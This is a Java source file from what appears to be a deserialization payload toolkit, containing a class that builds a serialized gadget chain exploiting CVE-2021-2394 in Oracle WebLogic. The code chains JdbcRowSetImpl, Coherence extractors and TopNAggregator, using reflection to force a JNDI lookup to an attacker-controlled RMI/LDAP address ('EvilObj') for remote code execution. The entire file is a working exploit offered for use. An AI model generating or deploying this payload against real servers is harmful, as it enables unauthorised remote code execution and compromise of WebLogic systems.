package payloads;

import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.coherence.rest.util.extractor.MvelExtractor;
import com.tangosol.coherence.servlet.AttributeHolder;
import com.tangosol.util.aggregator.TopNAggregator;
import oracle.eclipselink.coherence.integrated.internal.querying.FilterExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
import common.Serializerable;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;
import util.PayloadRunner;

import java.lang.reflect.Field;
import java.lang.reflect.Method;

// Command: rmi/ldap://xxxxxxx:xxx/EvilObj
// CVE-2021-2394

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"weblogic:10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0"})
@Authors({ Authors.CCKUAILONG })
public class Weblogic11 implements ObjectPayload<Object> {

	public byte[] getObject(final String command) throws Exception {
		JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
		jdbcRowSet.setDataSourceName(command);

		// jdbcRowSet.getDatabaseMetaData间接调用lookup
		MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
		methodAttributeAccessor.setGetMethodName("connect");
		methodAttributeAccessor.setSetMethodName("setConnection");
		methodAttributeAccessor.setAttributeName("xxx");

		FilterExtractor filterExtractor = new FilterExtractor();
		filterExtractor.setAccessor(methodAttributeAccessor);

		MvelExtractor mvelExtractor = new MvelExtractor("");

		TopNAggregator.PartialResult sortedBag = new TopNAggregator.PartialResult(mvelExtractor, 2);
		AttributeHolder attributeHolder = new AttributeHolder();
		sortedBag.add(jdbcRowSet);

		Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField("m_comparator");
		m_comparator.setAccessible(true);
		m_comparator.set(sortedBag, filterExtractor);

		Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class);
		setInternalValue.setAccessible(true);
		setInternalValue.invoke(attributeHolder, sortedBag);

		return Serializerable.serialize(attributeHolder);
	}

	public static byte[] getBytes(final String command, Boolean fusion) throws Exception {
		return Weblogic11.class.newInstance().getObject(command);
	}

}
